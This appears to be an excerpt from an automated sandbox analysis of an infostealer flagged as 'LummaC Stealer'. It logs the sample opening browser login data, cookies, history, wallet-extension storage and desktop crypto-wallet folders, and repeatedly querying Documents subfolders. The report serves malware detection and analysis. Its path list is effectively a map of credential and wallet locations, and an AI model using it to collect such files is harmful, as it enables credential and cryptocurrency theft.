Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe

Directory queried: number of queries: 1001

Source: Yara match

File source: Process Memory Space: C7B4.tmp.exe PID: 3032, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
